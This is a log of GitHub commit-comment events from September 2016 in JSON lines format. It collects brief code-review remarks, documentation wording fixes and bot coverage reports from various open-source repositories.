{"id":"4596062574","type":"CommitCommentEvent","actor":{"login":"timbunce"},"repo":{"name":"llamashoes/kubetail"},"payload":{"comment":{"id":19113182,"position":null,"line":null,"path":null,"commit_id":"cfbbd8fb5479ad3a913b447b6dfc22747af910cf","created_at":"2016-09-21T12:57:57Z","updated_at":"2016-09-21T12:57:57Z","body":"Would be great to get this merged upstream."}},"created_at":"2016-09-21T12:57:57Z"}
{"id":"4596066495","type":"CommitCommentEvent","actor":{"login":"Noitidart"},"repo":{"name":"Jan02/amo-e10s"},"payload":{"comment":{"id":19113188,"position":13,"line":13,"path":"manifest.json","commit_id":"cf83bd99fe026843931b1c1fabb4f408d55f813e","created_at":"2016-09-21T12:58:39Z","updated_at":"2016-09-21T12:58:39Z","body":"lower case your addon name, replace spaces with hyphen. and then stick `@jetpack` on it"}},"created_at":"2016-09-21T12:58:39Z"}
{"id":"4596066540","type":"CommitCommentEvent","actor":{"login":"mcccs"},"repo":{"name":"ThisTestUser/Docs"},"payload":{"comment":{"id":19113189,"position":null,"line":null,"path":null,"commit_id":"ee739e1721641f4655aafd3d0cddd9b7defd69f0","created_at":"2016-09-21T12:58:40Z","updated_at":"2016-09-21T12:58:40Z","body":"As you see [here](http://www.mineplex.com/forums/m/11929946/viewthread/28444996-gwen-phase-two-release/post/123394959#p123394959) and [here](http://www.mineplex.com/forums/page/4/m/11929946/viewthread/28444996-gwen-phase-two-release#p123395396) it started to ban people."}},"created_at":"2016-09-21T12:58:40Z"}
{"id":"4596067190","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19113190,"position":null,"line":null,"path":null,"commit_id":"854ec0d54fb63e4f405107f256e9c18a5af581d0","created_at":"2016-09-21T12:58:47Z","updated_at":"2016-09-21T12:58:47Z","body":"[Code coverage](https://144-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **99.76%**"}},"created_at":"2016-09-21T12:58:47Z"}
{"id":"4596068428","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19113194,"position":null,"line":null,"path":null,"commit_id":"aef33a8af5bcf7d1072a0a0318d84afa7a0c7993","created_at":"2016-09-21T12:59:01Z","updated_at":"2016-09-21T12:59:01Z","body":"[Code coverage](https://146-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-21T12:59:01Z"}
{"id":"4596068857","type":"CommitCommentEvent","actor":{"login":"krnowak"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113197,"position":39,"line":39,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T12:59:06Z","updated_at":"2016-09-21T12:59:06Z","body":"I'd say no to \"the\" before \"scope\" and maybe put \"scope\" in backticks?\r\nAlso maybe \"if it discovers other plugins\"? But this part of the sentence is not really clear to me."}},"created_at":"2016-09-21T12:59:06Z"}
{"id":"4596068964","type":"CommitCommentEvent","actor":{"login":"luis100"},"repo":{"name":"keeps/roda"},"payload":{"comment":{"id":19113199,"position":5,"line":97,"path":"README.md","commit_id":"17c302a7552a8f39cacdab7460665b56b738a368","created_at":"2016-09-21T12:59:07Z","updated_at":"2016-09-21T12:59:07Z","body":"Translations *are* maintained *in* Transifex."}},"created_at":"2016-09-21T12:59:07Z"}
{"id":"4596069552","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19113204,"position":null,"line":null,"path":null,"commit_id":"e25b3d8438891007c66be40410422b8e70547efb","created_at":"2016-09-21T12:59:13Z","updated_at":"2016-09-21T12:59:13Z","body":"[Code coverage](https://145-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **99.78%**\nCompared to **100%** at [master](https://146-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html)\nCoverage decreased by **0.22%**"}},"created_at":"2016-09-21T12:59:13Z"}
{"id":"4596069628","type":"CommitCommentEvent","actor":{"login":"elyase"},"repo":{"name":"salestock/fastText.py"},"payload":{"comment":{"id":19113205,"position":null,"line":null,"path":null,"commit_id":"fc1de74812f4cd726ee21d3775c5bd71c402eb9d","created_at":"2016-09-21T12:59:14Z","updated_at":"2016-09-21T12:59:14Z","body":"I was thinking of an OrderedDict, might be better so that word frequencies can be added at some point. "}},"created_at":"2016-09-21T12:59:14Z"}
{"id":"4596070022","type":"CommitCommentEvent","actor":{"login":"endless-sky"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19113206,"position":null,"line":null,"path":null,"commit_id":"a2b60de63a9f9a14d894599e2bbbceac597b66c5","created_at":"2016-09-21T12:59:19Z","updated_at":"2016-09-21T12:59:19Z","body":"Those lines in AI.cpp were needed. There were basically two bugs that were canceling each other out: the one fixed here, and a separate bug allowing ships to take on fighters they didn't think they had space for, in AI.cpp. When the AI bug was fixed, the other bug reared its head. But the right solution is to fix both bugs, rather than to add the other bug back in."}},"created_at":"2016-09-21T12:59:19Z"}
{"id":"4596070212","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113207,"position":99,"line":99,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T12:59:21Z","updated_at":"2016-09-21T12:59:21Z","body":"what is this link?"}},"created_at":"2016-09-21T12:59:21Z"}
{"id":"4596070221","type":"CommitCommentEvent","actor":{"login":"antfu"},"repo":{"name":"raymondchiang/Maze"},"payload":{"comment":{"id":19113208,"position":63,"line":63,"path":"maze.py","commit_id":"46b3fcca36a1d32220ce44baa9964a21067f6967","created_at":"2016-09-21T12:59:21Z","updated_at":"2016-09-21T12:59:21Z","body":"乾，這什麽辣鷄Code"}},"created_at":"2016-09-21T12:59:21Z"}
{"id":"4596070711","type":"CommitCommentEvent","actor":{"login":"krnowak"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113210,"position":39,"line":39,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T12:59:27Z","updated_at":"2016-09-21T12:59:27Z","body":"Also \"`Plugins` is the list of the…\""}},"created_at":"2016-09-21T12:59:27Z"}
{"id":"4596072931","type":"CommitCommentEvent","actor":{"login":"pmuellr"},"repo":{"name":"nodesource/nsolid-statsd"},"payload":{"comment":{"id":19113215,"position":null,"line":null,"path":null,"commit_id":"e7d77fb362cf8f4cda391e4bc3134a38b2674707","created_at":"2016-09-21T12:59:51Z","updated_at":"2016-09-21T12:59:51Z","body":"Should this be a [`bundledDependencies`](https://docs.npmjs.com/files/package.json#bundleddependencies) thing?"}},"created_at":"2016-09-21T12:59:51Z"}
{"id":"4596072937","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19113216,"position":null,"line":null,"path":null,"commit_id":"d1315ff67aa85ae85bbf127186da62cc48c784ee","created_at":"2016-09-21T12:59:51Z","updated_at":"2016-09-21T12:59:51Z","body":"[Code coverage](https://147-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-21T12:59:51Z"}
{"id":"4596073570","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113219,"position":194,"line":194,"path":"device.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T12:59:57Z","updated_at":"2016-09-21T12:59:57Z","body":"strip去哪里了，另外空行有处理吗?"}},"created_at":"2016-09-21T12:59:57Z"}
{"id":"4596073801","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113220,"position":100,"line":100,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T13:00:00Z","updated_at":"2016-09-21T13:00:00Z","body":"s/identify/identifies"}},"created_at":"2016-09-21T13:00:00Z"}
{"id":"4596074331","type":"CommitCommentEvent","actor":{"login":"kkaefer"},"repo":{"name":"arnaudbrejeon/XcodeClangFormat"},"payload":{"comment":{"id":19113221,"position":null,"line":null,"path":null,"commit_id":"852e5ce5dd86b0ec2448dc13f3f9e2140ca04b4b","created_at":"2016-09-21T13:00:05Z","updated_at":"2016-09-21T13:00:05Z","body":"What was the issue you were seeing?"}},"created_at":"2016-09-21T13:00:05Z"}
{"id":"4596075523","type":"CommitCommentEvent","actor":{"login":"hart-davis"},"repo":{"name":"hart-davis/Particle-Tracking-Project"},"payload":{"comment":{"id":19113224,"position":null,"line":null,"path":null,"commit_id":"b69a3f5e42bfd1b32d09410e1b2c875efdd1d0d7","created_at":"2016-09-21T13:00:18Z","updated_at":"2016-09-21T13:00:18Z","body":"Updated all the files"}},"created_at":"2016-09-21T13:00:18Z"}
{"id":"4596075686","type":"CommitCommentEvent","actor":{"login":"raymondchiang"},"repo":{"name":"raymondchiang/Maze"},"payload":{"comment":{"id":19113226,"position":63,"line":63,"path":"maze.py","commit_id":"46b3fcca36a1d32220ce44baa9964a21067f6967","created_at":"2016-09-21T13:00:19Z","updated_at":"2016-09-21T13:00:19Z","body":"拉基"}},"created_at":"2016-09-21T13:00:19Z"}
{"id":"4596076564","type":"CommitCommentEvent","actor":{"login":"Noitidart"},"repo":{"name":"Jan02/amo-e10s"},"payload":{"comment":{"id":19113228,"position":19,"line":19,"path":"manifest.json","commit_id":"cf83bd99fe026843931b1c1fabb4f408d55f813e","created_at":"2016-09-21T13:00:28Z","updated_at":"2016-09-21T13:00:28Z","body":"Change this entry in the array to match addon pages.\r\n\r\nFor example this is an addon page: `https://addons.mozilla.org/en-US/firefox/addon/findbar-tweak/?src=hp-dl-featured`\r\n\r\nSo to match this we would change `http://www.glowing-bear.org/*` to `https://addons.mozilla.org/*/firefox/addon/*/*`"}},"created_at":"2016-09-21T13:00:28Z"}
{"id":"4596077784","type":"CommitCommentEvent","actor":{"login":"vlachoudis"},"repo":{"name":"vlachoudis/bCNC"},"payload":{"comment":{"id":19113230,"position":null,"line":null,"path":null,"commit_id":"40075ef577c420d420af82209c3eca6827c88097","created_at":"2016-09-21T13:00:41Z","updated_at":"2016-09-21T13:00:41Z","body":"Thanks I just removed them :)"}},"created_at":"2016-09-21T13:00:41Z"}
{"id":"4596077858","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113231,"position":101,"line":101,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T13:00:41Z","updated_at":"2016-09-21T13:00:41Z","body":"s/by/by the"}},"created_at":"2016-09-21T13:00:41Z"}
{"id":"4596078351","type":"CommitCommentEvent","actor":{"login":"lostella"},"repo":{"name":"kul-forbes/Prox.jl"},"payload":{"comment":{"id":19113236,"position":67,"line":106,"path":"src/Prox.jl","commit_id":"a7e6248dbe59978fb983fa532a7b29520f142c49","created_at":"2016-09-21T13:00:47Z","updated_at":"2016-09-21T13:00:47Z","body":"Is this sequence of arguments optimal? I'm wondering whether `y` should go somewhere else or not: having `gamma` as last argument would allow it to be optional and take `1.0` as default value."}},"created_at":"2016-09-21T13:00:47Z"}
{"id":"4596078579","type":"CommitCommentEvent","actor":{"login":"Noitidart"},"repo":{"name":"Jan02/amo-e10s"},"payload":{"comment":{"id":19113238,"position":1,"line":1,"path":"watchify.js","commit_id":"cf83bd99fe026843931b1c1fabb4f408d55f813e","created_at":"2016-09-21T13:00:49Z","updated_at":"2016-09-21T13:00:49Z","body":"make this whole file just be `alert('hi on page!')`"}},"created_at":"2016-09-21T13:00:49Z"}
{"id":"4596079247","type":"CommitCommentEvent","actor":{"login":"krnowak"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113243,"position":40,"line":40,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T13:00:56Z","updated_at":"2016-09-21T13:00:56Z","body":"Maybe s/carries/contains/? And maybe describe what `Processes` really is? Because containing the measurements done by the plugin can be a description of any topology."}},"created_at":"2016-09-21T13:00:56Z"}
{"id":"4596081607","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113247,"position":225,"line":225,"path":"device.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T13:01:23Z","updated_at":"2016-09-21T13:01:23Z","body":"可简写成 `d.shell(\"kill\", \"-9\", pid)`"}},"created_at":"2016-09-21T13:01:23Z"}
{"id":"4596081751","type":"CommitCommentEvent","actor":{"login":"apastore"},"repo":{"name":"chapmanb/bcbio-nextgen"},"payload":{"comment":{"id":19113248,"position":null,"line":null,"path":null,"commit_id":"510367397c12949822dd04be5e2a6f992a4bcb9f","created_at":"2016-09-21T13:01:25Z","updated_at":"2016-09-21T13:01:25Z","body":"Thanks!"}},"created_at":"2016-09-21T13:01:25Z"}
{"id":"4596081939","type":"CommitCommentEvent","actor":{"login":"zhcosin"},"repo":{"name":"zhcosin/chinese-number"},"payload":{"comment":{"id":19113249,"position":null,"line":null,"path":null,"commit_id":"498f994f34ebe3431ef5536c60b940b742074ad1","created_at":"2016-09-21T13:01:27Z","updated_at":"2016-09-21T13:01:27Z","body":"Very thank you."}},"created_at":"2016-09-21T13:01:27Z"}
{"id":"4596082182","type":"CommitCommentEvent","actor":{"login":"krnowak"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113250,"position":42,"line":42,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T13:01:30Z","updated_at":"2016-09-21T13:01:30Z","body":"Not sure if \"section\" is a good word here. Fragment? Snippet?"}},"created_at":"2016-09-21T13:01:30Z"}
{"id":"4596082784","type":"CommitCommentEvent","actor":{"login":"alepuccetti"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113253,"position":99,"line":99,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T13:01:37Z","updated_at":"2016-09-21T13:01:37Z","body":"This will be linked to the metrics documentation after I have done it"}},"created_at":"2016-09-21T13:01:37Z"}
{"id":"4596083284","type":"CommitCommentEvent","actor":{"login":"creatiombe"},"repo":{"name":"nacmartin/phpexecjs"},"payload":{"comment":{"id":19113255,"position":null,"line":null,"path":null,"commit_id":"4b95e346f589d5e67bd4ce15cec73ae50eb40a16","created_at":"2016-09-21T13:01:43Z","updated_at":"2016-09-21T13:01:43Z","body":"The detection does not work for windows 10 environments, PHP_WINDOWS_VERSION_MAJOR is not set in my mamp pro with php 7.0.9"}},"created_at":"2016-09-21T13:01:43Z"}
{"id":"4596083471","type":"CommitCommentEvent","actor":{"login":"prasoonsrivas"},"repo":{"name":"cardcorp/fbRads"},"payload":{"comment":{"id":19113256,"position":null,"line":null,"path":null,"commit_id":"87ad33f0f57db6ee33e4734a8fd8e15232248eec","created_at":"2016-09-21T13:01:45Z","updated_at":"2016-09-21T13:01:45Z","body":"@tokumotion am also getting the same error and I applied all above mention ways but didnt get rid of that error. Can u help me on this.\r\n\r\n"}},"created_at":"2016-09-21T13:01:45Z"}
{"id":"4596086232","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113264,"position":58,"line":58,"path":"minicap.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T13:02:13Z","updated_at":"2016-09-21T13:02:13Z","body":"NewAdbDevice这个方法暂时不要公开"}},"created_at":"2016-09-21T13:02:13Z"}
{"id":"4596086396","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113265,"position":87,"line":87,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T13:02:15Z","updated_at":"2016-09-21T13:02:15Z","body":"Why is it \"1.0\" instead of \"1\"? Are all values necessarily float points?"}},"created_at":"2016-09-21T13:02:15Z"}
{"id":"4596086546","type":"CommitCommentEvent","actor":{"login":"krnowak"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113266,"position":42,"line":42,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T13:02:17Z","updated_at":"2016-09-21T13:02:17Z","body":"Something like `Snippet from the report showing the `Plugins` field\", maybe."}},"created_at":"2016-09-21T13:02:17Z"}
{"id":"4596088732","type":"CommitCommentEvent","actor":{"login":"krnowak"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113269,"position":59,"line":59,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T13:02:41Z","updated_at":"2016-09-21T13:02:41Z","body":"Again, looks like it is duplicated from the other README."}},"created_at":"2016-09-21T13:02:41Z"}
{"id":"4596088907","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113270,"position":69,"line":69,"path":"minicap.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T13:02:43Z","updated_at":"2016-09-21T13:02:43Z","body":"应该经常存在localhost被改掉的情况，这个地方用 `127.0.0.1` 会更好一点"}},"created_at":"2016-09-21T13:02:43Z"}
{"id":"4596090082","type":"CommitCommentEvent","actor":{"login":"chirag04"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19113273,"position":null,"line":null,"path":null,"commit_id":"38979f9c68bd054aca3c6102635b2005914506b1","created_at":"2016-09-21T13:02:54Z","updated_at":"2016-09-21T13:02:54Z","body":"@lsps9150414 I haven't tried but with absolute position your scene will be on top of the header."}},"created_at":"2016-09-21T13:02:54Z"}
{"id":"4596091577","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113279,"position":59,"line":59,"path":"minicap.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T13:03:11Z","updated_at":"2016-09-21T13:03:11Z","body":"这是什么Port？"}},"created_at":"2016-09-21T13:03:11Z"}
{"id":"4596092607","type":"CommitCommentEvent","actor":{"login":"vasilije-blazeni"},"repo":{"name":"vasilije-blazeni/pristup-datoteci"},"payload":{"comment":{"id":19113282,"position":null,"line":null,"path":null,"commit_id":"0e016939e8d89f3cc50466da4860b253d506c852","created_at":"2016-09-21T13:03:23Z","updated_at":"2016-09-21T13:03:23Z","body":"proba dodavanja datoteke."}},"created_at":"2016-09-21T13:03:23Z"}
{"id":"4596092654","type":"CommitCommentEvent","actor":{"login":"krnowak"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113283,"position":67,"line":67,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T13:03:23Z","updated_at":"2016-09-21T13:03:23Z","body":"Same as above about `Plugins`."}},"created_at":"2016-09-21T13:03:23Z"}
{"id":"4596093412","type":"CommitCommentEvent","actor":{"login":"ddeboer"},"repo":{"name":"zotonic/zotonic"},"payload":{"comment":{"id":19113284,"position":null,"line":null,"path":null,"commit_id":"c53773fe2080f8f2442e4b07018d8b7a877f8d3b","created_at":"2016-09-21T13:03:32Z","updated_at":"2016-09-21T13:03:32Z","body":"Right. 😄 "}},"created_at":"2016-09-21T13:03:32Z"}
{"id":"4596093859","type":"CommitCommentEvent","actor":{"login":"luis100"},"repo":{"name":"keeps/roda"},"payload":{"comment":{"id":19113285,"position":5,"line":97,"path":"README.md","commit_id":"17c302a7552a8f39cacdab7460665b56b738a368","created_at":"2016-09-21T13:03:38Z","updated_at":"2016-09-21T13:03:38Z","body":"Done in e5d20a559e8480582f90c0436d6fd4d0639d42a4"}},"created_at":"2016-09-21T13:03:38Z"}
{"id":"4596094248","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113287,"position":56,"line":56,"path":"minicap.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T13:03:43Z","updated_at":"2016-09-21T13:03:43Z","body":"这个地方需要加点注释了？用于方便生成文档"}},"created_at":"2016-09-21T13:03:43Z"}
{"id":"4596094518","type":"CommitCommentEvent","actor":{"login":"argus-gabrielec"},"repo":{"name":"argus-gabrielec/hello-world"},"payload":{"comment":{"id":19113288,"position":null,"line":null,"path":null,"commit_id":"720b6c624e3b07b4c699d6cd5e099c7bb1a42b25","created_at":"2016-09-21T13:03:45Z","updated_at":"2016-09-21T13:03:45Z","body":"a"}},"created_at":"2016-09-21T13:03:45Z"}
{"id":"4596096413","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113294,"position":74,"line":74,"path":"minicap.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T13:04:07Z","updated_at":"2016-09-21T13:04:07Z","body":"newRotation -> newRotationService"}},"created_at":"2016-09-21T13:04:07Z"}
{"id":"4596099312","type":"CommitCommentEvent","actor":{"login":"alepuccetti"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113301,"position":87,"line":87,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T13:04:39Z","updated_at":"2016-09-21T13:04:39Z","body":"I have never seen a non-integer value, but in the code is defined as `float`\r\nhttps://github.com/weaveworks/scope/blob/master/examples/plugins/http-requests/http-requests.py#L104"}},"created_at":"2016-09-21T13:04:39Z"}
{"id":"4596099600","type":"CommitCommentEvent","actor":{"login":"krnowak"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113302,"position":98,"line":98,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T13:04:43Z","updated_at":"2016-09-21T13:04:43Z","body":"has a single `metric_templates` array field containing one or more elements?"}},"created_at":"2016-09-21T13:04:43Z"}
{"id":"4596102073","type":"CommitCommentEvent","actor":{"login":"lcdsantos"},"repo":{"name":"lcdsantos/jQuery-Selectric"},"payload":{"comment":{"id":19113310,"position":null,"line":null,"path":null,"commit_id":"c78b153cb5a46cd633a5060d6a8e91c4f6fde8ac","created_at":"2016-09-21T13:05:12Z","updated_at":"2016-09-21T13:05:12Z","body":"I think we can start working on that soon as we release multiple support.\r\n\r\nOne thing I can't wait to remove is this: [selectric.scss](https://github.com/lcdsantos/jQuery-Selectric/blob/master/src/selectric.scss#L47). And use more ES5 functions that I purposely left out.\r\n\r\n\r\nIf I started today writing this I would use ES6 and transpile back to ES5. But that's a long shot by now :)"}},"created_at":"2016-09-21T13:05:12Z"}
{"id":"4596102108","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113312,"position":87,"line":87,"path":"minicap.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T13:05:13Z","updated_at":"2016-09-21T13:05:13Z","body":"isFileExisted 怎么还有两个返回值？"}},"created_at":"2016-09-21T13:05:13Z"}
{"id":"4596103715","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/wiritttes"},"payload":{"comment":{"id":19113317,"position":null,"line":null,"path":null,"commit_id":"9b27fe10db40f33ff70279656b988ee719cd0a50","created_at":"2016-09-21T13:05:29Z","updated_at":"2016-09-21T13:05:29Z","body":"[R/alignment_to_beast_posterior.R:103:3:](https://github.com/richelbilderbeek/wiritttes/blob/9b27fe10db40f33ff70279656b988ee719cd0a50/R/alignment_to_beast_posterior.R#L103) *warning:* **local variable ‘has_error’ assigned but may not be used**\n```r\n​  has_error <- FALSE\n  ^~~~~~~~~\n```"}},"created_at":"2016-09-21T13:05:29Z"}
{"id":"4596105143","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113319,"position":87,"line":87,"path":"minicap.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T13:05:45Z","updated_at":"2016-09-21T13:05:45Z","body":"还有一般都叫做 isFileExists"}},"created_at":"2016-09-21T13:05:45Z"}
{"id":"4596106594","type":"CommitCommentEvent","actor":{"login":"AnuragSh005"},"repo":{"name":"AnuragSh005/SparkJava"},"payload":{"comment":{"id":19113322,"position":null,"line":null,"path":null,"commit_id":"46723c844621c4248a8419b990e0fd0bb686512b","created_at":"2016-09-21T13:06:00Z","updated_at":"2016-09-21T13:06:00Z","body":"a"}},"created_at":"2016-09-21T13:06:00Z"}
{"id":"4596108429","type":"CommitCommentEvent","actor":{"login":"nacmartin"},"repo":{"name":"nacmartin/phpexecjs"},"payload":{"comment":{"id":19113326,"position":null,"line":null,"path":null,"commit_id":"4b95e346f589d5e67bd4ce15cec73ae50eb40a16","created_at":"2016-09-21T13:06:07Z","updated_at":"2016-09-21T13:06:07Z","body":"Arr... do you have any suggestion here? I don't really use Windows, we did a quick setup in a partition but I don't have easy access to Windows machines for testing."}},"created_at":"2016-09-21T13:06:07Z"}
{"id":"4596108935","type":"CommitCommentEvent","actor":{"login":"DanCech"},"repo":{"name":"grafana/grafana"},"payload":{"comment":{"id":19113327,"position":6,"line":11,"path":"public/app/core/controllers/login_ctrl.js","commit_id":"b4111d78e15d37e8f55e736a88f8acf6dbe00a0e","created_at":"2016-09-21T13:06:12Z","updated_at":"2016-09-21T13:06:12Z","body":"These messages are used by social login plugins other than github, I'll merge this into the gnet-oauth branch and clean them up there."}},"created_at":"2016-09-21T13:06:12Z"}
{"id":"4596110377","type":"CommitCommentEvent","actor":{"login":"krnowak"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113333,"position":99,"line":99,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T13:06:27Z","updated_at":"2016-09-21T13:06:27Z","body":"s/carried/contained/? s/section/field/?\r\nWhat's up with this **link\\_to\\_metrics\\_in\\_the\\_docs**\r\ns/metric_template/metric_templates/"}},"created_at":"2016-09-21T13:06:27Z"}
{"id":"4596112325","type":"CommitCommentEvent","actor":{"login":"ojura"},"repo":{"name":"f32c/f32c"},"payload":{"comment":{"id":19113335,"position":14,"line":115,"path":"rtl/proj/lattice/ulx2s/sram/ulx2s_sram.ldf","commit_id":"ce930b3e9952c22046ff6800e76b1b2613b3cdfe","created_at":"2016-09-21T13:06:47Z","updated_at":"2016-09-21T13:06:47Z","body":"timing strategy not in repo left over in the project file"}},"created_at":"2016-09-21T13:06:47Z"}
{"id":"4596113178","type":"CommitCommentEvent","actor":{"login":"nfalco79"},"repo":{"name":"jenkinsci/nodejs-plugin"},"payload":{"comment":{"id":19113337,"position":null,"line":null,"path":null,"commit_id":"f38e0a5d20a747d235dd1c439ebb92eef4b0fe8f","created_at":"2016-09-21T13:06:57Z","updated_at":"2016-09-21T13:06:57Z","body":"same here.\r\nWith some of these changes could not run anymore npm command under linux"}},"created_at":"2016-09-21T13:06:57Z"}
{"id":"4596114452","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113340,"position":102,"line":102,"path":"minicap.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T13:07:11Z","updated_at":"2016-09-21T13:07:11Z","body":"不妨写个`for _, filename := range []string{\"minicap.so\", \"minicap\"}`"}},"created_at":"2016-09-21T13:07:11Z"}
{"id":"4596115601","type":"CommitCommentEvent","actor":{"login":"dierdong"},"repo":{"name":"apereo/cas"},"payload":{"comment":{"id":19113344,"position":null,"line":null,"path":null,"commit_id":"eec791bb3d19f9cfa77f4ad7fb3aa127e536bdab","created_at":"2016-09-21T13:07:24Z","updated_at":"2016-09-21T13:07:24Z","body":"HttpOnly flag with TGC missed, while 4.1.6 is ok."}},"created_at":"2016-09-21T13:07:24Z"}
{"id":"4596116100","type":"CommitCommentEvent","actor":{"login":"nkaraolis"},"repo":{"name":"hmrc/self-service-time-to-pay"},"payload":{"comment":{"id":19113348,"position":43,"line":87,"path":"app/uk/gov/hmrc/ssttp/services/CalculatorService.java","commit_id":"4b4c4449d816833a2bb9f0e52b697324e5aa2be2","created_at":"2016-09-21T13:07:31Z","updated_at":"2016-09-21T13:07:31Z","body":"Done fixed this one :+1: "}},"created_at":"2016-09-21T13:07:31Z"}
